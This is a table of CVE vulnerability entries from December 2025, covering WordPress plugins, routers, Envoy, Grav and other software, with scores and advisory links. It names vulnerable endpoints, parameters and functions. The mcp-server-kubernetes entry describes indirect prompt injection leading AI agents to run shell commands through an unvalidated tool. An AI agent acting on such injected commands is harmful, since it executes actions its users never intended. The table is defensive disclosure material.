| codeconfig--CodeConfig Accessibility | The Accessiy By CodeConfig Accessibility - Easy One-Click Accessibility Toolbar That Truly Matters plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 1.0.0. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers with subscriber-level access and above to modify the plugin's global accessibility settings. | 2025-12-06 | 4.3 | CVE-2025-13309 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f3344e72-1dd6-45ec-b699-d755589a1566?source=cve https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/trunk/includes/Ajax/Settings.php#L23 https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/trunk/includes/Ajax.php#L19 https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/trunk/includes/Enqueue.php#L135 |
| codejunkie--Clik stats | The Clik stats plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` parameter in all versions up to, and including, 0.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-04 | 6.1 | CVE-2025-13513 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8a047313-fdbc-47fa-912a-a624033bbce1?source=cve https://plugins.trac.wordpress.org/browser/clikstats/trunk/ck_admin.php#L47 https://plugins.trac.wordpress.org/browser/clikstats/tags/0.8/ck_admin.php#L47 |
| CODESYS--CODESYS PLCHandler | An unauthenticated remote attacker, who beats a race condition, can exploit a flaw in the communication servers of the CODESYS Control runtime system on Linux and QNX to trigger an out-of-bounds read via crafted socket communication, potentially causing a denial of service. | 2025-12-01 | 5.9 | CVE-2025-41739 | https://certvde.com/de/advisories/VDE-2025-099 |
| contentstudio--ContentStudio | The ContentStudio plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.7. This is due to missing or insufficient nonce validation on the add_cstu_settings function. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 4.3 | CVE-2025-13144 | https://www.wordfence.com/threat-intel/vulnerabilities/id/047fd07c-ab07-49bf-8a94-8ae33c92f93e?source=cve https://plugins.trac.wordpress.org/browser/contentstudio/tags/1.3.7/contentstudio-plugin.php#L380 https://plugins.trac.wordpress.org/browser/contentstudio/tags/1.3.7/contentstudio-plugin.php#L383 |
| d3395--CryptX | The CryptX plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `cryptx` shortcode in all versions up to, and including, 4.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-05 | 6.4 | CVE-2025-13739 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2f8cb7d7-eb40-403e-85de-c16200ee424d?source=cve https://plugins.trac.wordpress.org/browser/cryptx/tags/4.0.4/classes/CryptX.php#L149 https://plugins.trac.wordpress.org/browser/cryptx/tags/4.0.4/classes/CryptX.php#L237 https://plugins.trac.wordpress.org/browser/cryptx/tags/4.0.4/classes/CryptX.php#L604 https://plugins.trac.wordpress.org/browser/cryptx/tags/4.0.4/classes/CryptX.php#L1295 |
| danrajkumar--Nouri.sh Newsletter | The Nouri.sh Newsletter plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` parameter in all versions up to, and including, 1.0.1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-05 | 6.1 | CVE-2025-13515 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d5f0587e-1f84-472c-8fb7-13ddda63e2ec?source=cve https://plugins.trac.wordpress.org/browser/newsletters-from-rss-to-email-newsletters-using-nourish/trunk/templates/options.phtml#L7 https://plugins.trac.wordpress.org/browser/newsletters-from-rss-to-email-newsletters-using-nourish/tags/v1.0.13/templates/options.phtml#L7 |
| Datateam Information Technologies Inc.--Datactive | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting'), Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Datateam Information Technologies Inc. Datactive allows Stored XSS.This issue affects Datactive: from 2.13.34 before 2.14.0.6. | 2025-12-02 | 4.8 | CVE-2025-13505 | https://www.usom.gov.tr/bildirim/tr-25-0424 |
| dayrui--XunRuiCMS | A security flaw has been discovered in dayrui XunRuiCMS up to 4.7.1. Affected is an unknown function of the file /admind45f74adbd95.php?c=email&m=add of the component Email Setting Handler. Performing manipulation results in server-side request forgery. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-04 | 4.7 | CVE-2025-14004 | VDB-334246 | dayrui XunRuiCMS Email Setting admind45f74adbd95.php server-side request forgery VDB-334246 | CTI Indicators (IOB, IOC, IOA) Submit #692907 | Sichuan Xunrui Cloud Software Development Co., Ltd xunruicms <=4.7.1 Server-Side Request Forgery https://github.com/24-2021/vul/blob/main/xunruicms-email_test-SSRF/xunruicms-email_test-SSRF.md |
| dayrui--XunRuiCMS | A flaw has been found in dayrui XunRuiCMS up to 4.7.1. This vulnerability affects unknown code of the file admin79f2ec220c7e.php?c=api&m=test_site_domain of the component Project Domain Change Test. This manipulation of the argument v causes server-side request forgery. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-04 | 4.7 | CVE-2025-14008 | VDB-334250 | dayrui XunRuiCMS Project Domain Change Test admin79f2ec220c7e.php server-side request forgery VDB-334250 | CTI Indicators (IOB, IOC, IOA) Submit #692915 | Sichuan Xunrui Cloud Software Development Co., Ltd x <=4.7.1 Server-Side Request Forgery https://github.com/24-2021/vul/blob/main/xunruicms-test_site_domain-SSRF/xunruicms-test_site_domain-SSRF.md |
| delabon--Live Sales Notification for Woocommerce Woomotiv | The Live Sales Notification for Woocommerce - Woomotiv plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'woomotiv_limit' parameter in all versions up to, and including, 3.6.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-06 | 6.1 | CVE-2025-13137 | https://www.wordfence.com/threat-intel/vulnerabilities/id/19257e49-addb-4882-af5f-8de0d90a4a86?source=cve https://wordpress.org/plugins/woomotiv/ |
| devsoftbaltic--SurveyJS: Drag & Drop WordPress Form Builder to create, style and embed multiple forms of any complexity | The SurveyJS: Drag & Drop WordPress Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.12.20. This is due to missing nonce validation on the SurveyJS_DeleteSurvey AJAX action. This makes it possible for unauthenticated attackers to delete surveys via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-02 | 4.3 | CVE-2025-13140 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5d96ea1b-1763-4a54-bd67-ac29175e9e01?source=cve https://plugins.trac.wordpress.org/browser/surveyjs/tags/1.12.20/ajax_handlers/delete_survey.php#L12 https://plugins.trac.wordpress.org/changeset/3403869/surveyjs/trunk/ajax_handlers/delete_survey.php |
| dojodigital--Live CSS Preview | The Live CSS Preview plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_frontend_save' AJAX endpoint in all versions up to, and including, 2.0.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's css setting. | 2025-12-05 | 4.3 | CVE-2025-12354 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3ebaadf6-5085-4f2d-a377-34e318351449?source=cve https://wordpress.org/plugins/live-css-preview/ |
| dripadmin--CRM Memberships | The CRM Memberships plugin for WordPress is vulnerable to unauthorized membership tag creation due to a missing capability check on the 'ntzcrm_add_new_tag' function in all versions up to, and including, 2.5. This makes it possible for unauthenticated attackers to create arbitrary membership tags and modify CRM configuration that should be restricted to administrators. | 2025-12-05 | 5.3 | CVE-2025-13312 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f61b9de5-5c37-4efb-ad1c-006e9fc05bc2?source=cve https://plugins.trac.wordpress.org/browser/crm-memberships/tags/2.5/includes/class/class-ntzcrm-api.php#L828 https://plugins.trac.wordpress.org/browser/crm-memberships/tags/2.5/includes/class/class-ntzcrm-api.php#L14 |
| duddi--Image Optimizer by wps.sk | The Image Optimizer by wps.sk plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.0. This is due to missing or incorrect nonce validation on the imagopby_ajax_optimize_gallery() function. This makes it possible for unauthenticated attackers to trigger bulk optimization via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 4.3 | CVE-2025-12190 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d321183a-f0ef-4b5b-855a-da95edb610b9?source=cve https://plugins.trac.wordpress.org/browser/image-optimizer-wpssk/tags/1.2.0/image-optimizer-wpssk.php https://plugins.svn.wordpress.org/image-optimizer-wpssk/tags/1.2.0/image-optimizer-wpssk.php |
| Edimax--BR-6478AC V3 | A security vulnerability has been detected in Edimax BR-6478AC V3 1.0.15. This issue affects the function sub_416898 of the file /boafrm/formDebugDiagnosticRun. The manipulation of the argument host leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 4.7 | CVE-2025-14092 | VDB-334482 | Edimax BR-6478AC V3 formDebugDiagnosticRun sub_416898 os command injection VDB-334482 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #696632 | EDIMAX BR-6478AC V3 1.0.15 Remote command execution https://github.com/Kriswu1337/CVE/blob/main/EDIMAX/1/1.md |
| Edimax--BR-6478AC V3 | A vulnerability was detected in Edimax BR-6478AC V3 1.0.15. Impacted is the function sub_416990 of the file /boafrm/formTracerouteDiagnosticRun. The manipulation of the argument host results in os command injection. The attack can be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 4.7 | CVE-2025-14093 | VDB-334483 | Edimax BR-6478AC V3 formTracerouteDiagnosticRun sub_416990 os command injection VDB-334483 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #696633 | EDIMAX BR-6478AC V3 1.0.15 Remote command execution https://github.com/Kriswu1337/CVE/blob/main/EDIMAX/1/2.md |
| Edimax--BR-6478AC V3 | A flaw has been found in Edimax BR-6478AC V3 1.0.15. The affected element is the function sub_44CCE4 of the file /boafrm/formSysCmd. This manipulation of the argument sysCmd causes os command injection. The attack may be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 4.7 | CVE-2025-14094 | VDB-334484 | Edimax BR-6478AC V3 formSysCmd sub_44CCE4 os command injection VDB-334484 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #696668 | EDIMAX BR-6478AC V3 1.0.15 Remote command execution https://github.com/Kriswu1337/CVE/blob/main/EDIMAX/1/3.md |
| elextensions--ELEX WordPress HelpDesk & Customer Ticketing System | The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.3.2. This is due to missing authorization checks on the eh_crm_edit_agent AJAX action. This makes it possible for authenticated attackers, with Contributor-level access and above, to escalate their WSDesk privileges from limited "Reply Tickets" permissions to full helpdesk administrator capabilities, gaining unauthorized access to ticket management, settings configuration, agent administration, and sensitive customer data. | 2025-12-02 | 6.3 | CVE-2025-13534 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3541794b-7c8a-42f8-9688-7f3dbbb08e58?source=cve https://plugins.trac.wordpress.org/browser/elex-helpdesk-customer-support-ticket-system/trunk/includes/class-crm-ajax-functions-two.php#L9 https://plugins.trac.wordpress.org/browser/elex-helpdesk-customer-support-ticket-system/tags/3.3.2/includes/class-crm-ajax-functions-two.php#L9 https://plugins.trac.wordpress.org/browser/stm-gallery/trunk/stmgallery_v.0.9.php#L121 |
| emaude--Canadian Nutrition Facts Label | The Canadian Nutrition Facts Label plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'percentage' field in the Nutrition Label custom post type in all versions up to, and including, 3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-06 | 6.4 | CVE-2025-12715 | https://www.wordfence.com/threat-intel/vulnerabilities/id/950e5d04-1436-4886-8d36-fca38bd9414a?source=cve https://plugins.trac.wordpress.org/browser/canadian-nutrition-facts-label/tags/3.0/canadian-nutrition-facts-label.php#L557 |
| envoyproxy--envoy | Envoy is a high-performance edge/middle/service proxy. In 1.33.12, 1.34.10, 1.35.6, 1.36.2, and earlier, Envoy crashes when JWT authentication is configured with the remote JWKS fetching, allow_missing_or_failed is enabled, multiple JWT tokens are present in the request headers and the JWKS fetch fails. This is caused by a re-entry bug in the JwksFetcherImpl. When the first token's JWKS fetch fails, onJwksError() callback triggers processing of the second token, which calls fetch() again on the same fetcher object. The original callback's reset() then clears the second fetch's state (receiver_ and request_) which causes a crash when the async HTTP response arrives. | 2025-12-03 | 6.5 | CVE-2025-64527 | https://github.com/envoyproxy/envoy/security/advisories/GHSA-mp85-7mrq-r866 |
| envoyproxy--envoy | Envoy is a high-performance edge/middle/service proxy. In 1.33.12, 1.34.10, 1.35.6, 1.36.2, and earlier, Envoy's mTLS certificate matcher for match_typed_subject_alt_names may incorrectly treat certificates containing an embedded null byte (\0) inside an OTHERNAME SAN value as valid matches. | 2025-12-03 | 5 | CVE-2025-66220 | https://github.com/envoyproxy/envoy/security/advisories/GHSA-rwjg-c3h2-f57p |
| error311--FileRise | FileRise is a self-hosted web-based file manager with multi-file upload, editing, and batch operations. Prior to 2.2.3, a stored cross-site scripting (XSS) vulnerability exists in the Filerise application due to improper handling of uploaded SVG files. The application accepts user-supplied SVG uploads without sanitizing or restricting embedded script content. When a malicious SVG containing inline JavaScript or event-based payloads is uploaded, it is later rendered directly in the browser whenever viewed within the application. Because SVGs are XML-based and allow scripting, they execute in the origin context of the application, enabling full stored XSS. This vulnerability is fixed in 2.2.3. | 2025-12-01 | 4.6 | CVE-2025-66403 | https://github.com/error311/FileRise/security/advisories/GHSA-qrcv-vjvf-fr29 https://github.com/error311/FileRise/commit/f2ce43f18f0444f8f63f7c33758d1837dd5ba91e |
| everestthemes--Everest Backup WordPress Cloud Backup, Migration, Restore & Cloning Plugin | The Everest Backup - WordPress Cloud Backup, Migration, Restore & Cloning Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the process_status_unlink() function in all versions up to, and including, 2.3.8. This makes it possible for unauthenticated attackers to delete the back-up progress files and cause a back-up to fail while it is in progress. | 2025-12-03 | 5.3 | CVE-2025-10304 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f7d7c619-7dc0-47a5-a203-6df4dfa0158b?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3400800%40everest-backup&new=3400800%40everest-backup&sfp_email=&sfph_mail= |
| Facebook--proxygen | Sending an HTTP request/response body with greater than 2^31 bytes triggers an infinite loop in proxygen::coro::HTTPQuicCoroSession which blocks the backing event loop and unconditionally appends data to a std::vector per-loop iteration. This issue leads to unbounded memory growth and eventually causes the process to run out of memory. | 2025-12-02 | 5.3 | CVE-2025-55181 | https://www.facebook.com/security/advisories/cve-2025-55181 https://github.com/facebook/proxygen/commit/17689399ef99b7c3d3a8b2b768b1dba1a4b72f8f |
| fit2cloud--Halo | A vulnerability has been found in fit2cloud Halo 2.21.10. Impacted is an unknown function. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-06 | 4.3 | CVE-2025-14117 | VDB-334494 | fit2cloud Halo cross-site request forgery VDB-334494 | CTI Indicators (IOB, IOC) Submit #697391 | fit2cloud Halo 2.21.10 Cross-Site Request Forgery https://blksword.flowus.cn/ https://github.com/BlkSword/POC |
| floragunn--Search Guard FLX | In Search Guard FLX versions from 3.1.0 up to 4.0.0 with enterprise modules being disabled, there exists an issue which allows authenticated users to use specially crafted requests to read documents from data streams without having the respective privileges. | 2025-12-01 | 4.3 | CVE-2025-13653 | https://search-guard.com/cve-advisory/ https://docs.search-guard.com/latest/changelog-searchguard-flx-4_0_1 |
| Flux159--mcp-server-kubernetes | MCP Server Kubernetes is an MCP Server that can connect to a Kubernetes cluster and manage it. Prior to 2.9.8, there is a security issue exists in the exec_in_pod tool of the mcp-server-kubernetes MCP Server. The tool accepts user-provided commands in both array and string formats. When a string format is provided, it is passed directly to shell interpretation (sh -c) without input validation, allowing shell metacharacters to be interpreted. This vulnerability can be exploited through direct command injection or indirect prompt injection attacks, where AI agents may execute commands without explicit user intent. This vulnerability is fixed in 2.9.8. | 2025-12-03 | 6.4 | CVE-2025-66404 | https://github.com/Flux159/mcp-server-kubernetes/security/advisories/GHSA-wvxp-jp4w-w8wg https://github.com/Flux159/mcp-server-kubernetes/commit/d091107ff92d9ffad1b3c295092f142d6578c48b |
| Fortra--GoAnywhere MFT | An Improper Access Control in the SFTP service in Fortra's GoAnywhere MFT prior to version 7.9.0 allows Web Users with an Authentication Alias and a valid SSH key but limited to Password authentication for SFTP to still login using their SSH key. | 2025-12-05 | 4.2 | CVE-2025-8148 | https://www.fortra.com/security/advisories/product-security/fi-2025-013 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to 15.86.0 and 14.99.2, certain requests were vulnerable to path traversal attacks, wherein some files from the server could be retrieved if the full path was known. Sites hosted on Frappe Cloud, and even other setups that are behind a reverse proxy like NGINX are unaffected. This would mainly affect someone directly using werkzeug/gunicorn. In those cases, either an upgrade or changing the setup to use a reverse proxy is recommended. This vulnerability is fixed in 15.86.0 and 14.99.2. | 2025-12-01 | 6.8 | CVE-2025-66206 | https://github.com/frappe/frappe/security/advisories/GHSA-v4wg-gqfr-rpjm |
| garidium--g-FFL Cockpit | The g-FFL Cockpit plugin for WordPress is vulnerable to unauthorized modification of data due to IP-based authorization that can be spoofed in the handle_enqueue_only() function in all versions up to, and including, 1.7.1. This makes it possible for unauthenticated attackers to delete arbitrary products. | 2025-12-06 | 5.3 | CVE-2025-12720 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3405974d-cf0a-4fef-9693-5d81833f42d6?source=cve https://plugins.trac.wordpress.org/browser/g-ffl-cockpit/trunk/includes/class-update-processor.php#L634 https://github.com/d0n601/CVE-2025-12720 https://ryankozak.com/posts/cve-2025-12720/ |
| garidium--g-FFL Cockpit | The g-FFL Cockpit plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.7.1 via the /server_status REST API endpoint due to a lack of capability checks. This makes it possible for unauthenticated attackers to extract information about the server. | 2025-12-06 | 5.3 | CVE-2025-12721 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2fd8c981-081c-4671-ad1e-3caf004669dd?source=cve https://plugins.trac.wordpress.org/browser/g-ffl-cockpit/trunk/includes/class-sync-endpoint.php#L1385 https://github.com/d0n601/CVE-2025-12721 https://ryankozak.com/posts/cve-2025-12721/ |
| georgestephanis--Application Passwords | The Application Passwords plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'reject_url' parameter in all versions up to, and including, 0.1.3. This is due to insufficient input sanitization and output escaping on user supplied URLs, which allows javascript: URI schemes to be embedded in the reject_url parameter. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute when a user clicks the "No, I do not approve of this connection" button, granted they can successfully trick the victim into performing an action such as clicking on a link. | 2025-12-06 | 5.4 | CVE-2025-13308 | https://www.wordfence.com/threat-intel/vulnerabilities/id/59fdfdf3-e9fe-44d2-82f4-7a612a51d376?source=cve https://plugins.trac.wordpress.org/browser/application-passwords/tags/0.1.3/auth-app.js#L61 https://plugins.trac.wordpress.org/browser/application-passwords/tags/0.1.3/class.application-passwords.php#L418 https://plugins.trac.wordpress.org/browser/application-passwords/tags/0.1.3/class.application-passwords.php#L432 |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, A path traversal vulnerability has been identified in Grav CMS, allowing authenticated attackers with administrative privileges to read arbitrary files on the underlying server filesystem. This vulnerability arises due to insufficient input sanitization in the backup tool, where user-supplied paths are not properly restricted, enabling access to files outside the intended webroot directory. The impact of this vulnerability depends on the privileges of the user account running the application. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | 6.8 | CVE-2025-66302 | https://github.com/getgrav/grav/security/advisories/GHSA-j422-qmxp-hv94 https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, users with read access on the user account management section of the admin panel can view the password hashes of all users, including the admin user. This exposure can potentially lead to privilege escalation if an attacker can crack these password hashes. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | 6.2 | CVE-2025-66304 | https://github.com/getgrav/grav/security/advisories/GHSA-gq3g-666w-7h85 https://github.com/getgrav/grav/commit/9d11094e4133f059688fad1e00dbe96fb6e3ead7 |
| getgrav--grav | This admin plugin for Grav is an HTML user interface that provides a convenient way to configure Grav and easily create and modify pages. Prior to 1.11.0-beta.1, a user enumeration and email disclosure vulnerability exists in Grav. The "Forgot Password" functionality at /admin/forgot leaks information about valid usernames and their associated email addresses through distinct server responses. This allows an attacker to enumerate users and disclose sensitive email addresses, which can be leveraged for targeted attacks such as password spraying, phishing, or social engineering. This vulnerability is fixed in 1.11.0-beta.1. | 2025-12-01 | 6.5 | CVE-2025-66307 | https://github.com/getgrav/grav/security/advisories/GHSA-q3qx-cp62-f6m7 https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0 |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, A Denial of Service (DoS) vulnerability has been identified in Grav related to the handling of scheduled_at parameters. Specifically, the application fails to properly sanitize input for cron expressions. By manipulating the scheduled_at parameter with a malicious input, such as a single quote, the application admin panel becomes non-functional, causing significant disruptions to administrative operations. The only way to recover from this issue is to manually access the host server and modify the backup.yaml file to correct the corrupted cron expression. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | 4.9 | CVE-2025-66303 | https://github.com/getgrav/grav/security/advisories/GHSA-x62q-p736-3997 https://github.com/getgrav/grav/commit/9d11094e4133f059688fad1e00dbe96fb6e3ead7 |
| getgrav--grav | Grav is a file-based Web platform. Prior to 1.8.0-beta.27, there is an IDOR (Insecure Direct Object Reference) vulnerability in the Grav CMS Admin Panel which allows low-privilege users to access sensitive information from other accounts. Although direct account takeover is not possible, admin email addresses and other metadata can be exposed, increasing the risk of phishing, credential stuffing, and social engineering. This vulnerability is fixed in 1.8.0-beta.27. | 2025-12-01 | 4.3 | CVE-2025-66306 | https://github.com/getgrav/grav/security/advisories/GHSA-4cwq-j7jv-qmwg https://github.com/getgrav/grav/commit/b7e1958a6e807ac14919447b60e5204a2ea77f62 |
| HCL Software--BigFix SaaS Remediate | The BigFix SaaS's HTTP responses were missing some security headers. The absence of these headers weakens the application's client-side security posture, making it more vulnerable to common web attacks that these headers are designed to mitigate, such as Cross-Site Scripting (XSS), Clickjacking, and protocol downgrade attacks. | 2025-12-02 | 5.4 | CVE-2025-52622 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127171 |
| helloprint--Plug your WooCommerce into the largest catalog of customized print products from Helloprint | The Helloprint plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.1.2. This is due to the plugin registering a public REST API endpoint without implementing authorization checks to verify request authenticity. This makes it possible for unauthenticated attackers to arbitrarily modify WooCommerce order statuses via the /wp-json/helloprint/v1/complete_order_from_helloprint_callback endpoint by providing a valid order reference ID. | 2025-12-06 | 5.3 | CVE-2025-13666 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4b07ed75-6ee3-4a1a-b165-439a9135b059?source=cve https://plugins.trac.wordpress.org/browser/helloprint/trunk/includes/Base/Controllers/Admin/OrderController.php#L48 https://plugins.trac.wordpress.org/browser/helloprint/tags/2.1.2/includes/Base/Controllers/Admin/OrderController.php#L48 |
| Himool--ERP | A vulnerability was identified in Himool ERP up to 2.2. Affected by this issue is the function update_account of the file /api/admin/update_account/ of the component AdminActionViewSet. Such manipulation leads to improper authorization. The attack may be performed from remote. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 6.3 | CVE-2025-14089 | VDB-334479 | Himool ERP AdminActionViewSet update_account improper authorization VDB-334479 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #696049 | https://gitee.com/himool/erp Himool ERP 2.2 Missing Authentication for Critical Function https://github.com/caigo8/CVE-md/blob/main/BoxwoodERP/%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE.md |
| huyme--Webcake Landing Page Builder | The Webcake - Landing Page Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'webcake_save_config' AJAX endpoint in all versions up to, and including, 1.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify the plugin's settings. | 2025-12-05 | 4.3 | CVE-2025-12165 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3bdeb2a1-ab97-45ff-808e-37e631d5e9cf?source=cve https://wordpress.org/plugins/webcake/ |
| instantsearchplus--Search, Filters & Merchandising for WooCommerce | The Search, Filters & Merchandising for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wcis_save_email' endpoint in all versions up to, and including, 3.0.63. This makes it possible for authenticated attackers, with Subscriber-level access and above, to deactivate the plugin. | 2025-12-06 | 4.3 | CVE-2025-12091 | https://www.wordfence.com/threat-intel/vulnerabilities/id/daa8f941-6e87-4b94-8526-f73770fe6f82?source=cve https://plugins.trac.wordpress.org/browser/instantsearch-for-woocommerce/tags/3.0.64/public/wcis_plugin.php#L1074 https://plugins.trac.wordpress.org/browser/instantsearch-for-woocommerce/trunk/public/wcis_plugin.php#L1074 |
| jairiidriss--RestaurantWebsite | A vulnerability was determined in jairiidriss RestaurantWebsite up to e7911f12d035e8e2f9a75e7a28b59e4ef5c1d654. Impacted is an unknown function of the component Make a Reservation. This manipulation of the argument selected_date causes cross site scripting. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 4.3 | CVE-2025-13802 | VDB-333812 | jairiidriss RestaurantWebsite Make a Reservation cross site scripting VDB-333812 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691839 | restaurant-website-php-mysql-master web 1 XSS vulnerability https://github.com/dream357/report/blob/main/restaurant-website-report.docx |
| jevgenisultanov--Norby AI | The Norby AI plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.3. This is due to missing nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 4.3 | CVE-2025-13362 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7dc6f6e2-6777-4056-95d0-e3d3e7ad7a22?source=cve https://plugins.trac.wordpress.org/browser/norby-ai/trunk/api/save.php#L23 https://plugins.trac.wordpress.org/browser/norby-ai/tags/1.0.3/api/save.php#L23 |
| jiangxin--CoSign Single Signon | The CoSign Single Signon plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` parameter in all versions up to, and including, 0.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-05 | 6.1 | CVE-2025-13512 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0bbeab52-59a9-4d8d-8e3e-ebcbbca9816b?source=cve https://plugins.trac.wordpress.org/browser/cosign-sso/trunk/cosign-sso.php#L423 https://plugins.trac.wordpress.org/browser/cosign-sso/tags/0.3.1/cosign-sso.php#L423 |
| jimmyredline80--SSP Debug | The SSP Debug plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.0. This is due to the plugin storing PHP error logs in a predictable, web-accessible location (wp-content/uploads/ssp-debug/ssp-debug.log) without any access controls. This makes it possible for unauthenticated attackers to view sensitive debugging information including full URLs, client IP addresses, User-Agent strings, WordPress user IDs, and internal filesystem paths. | 2025-12-05 | 5.3 | CVE-2025-13494 | https://www.wordfence.com/threat-intel/vulnerabilities/id/66f29499-1522-43cd-af78-9b734c66af8c?source=cve https://plugins.trac.wordpress.org/browser/ssp-debugging/trunk/ssp-debug.php#L221 https://plugins.trac.wordpress.org/browser/ssp-debugging/tags/1.0.0/ssp-debug.php#L221 |
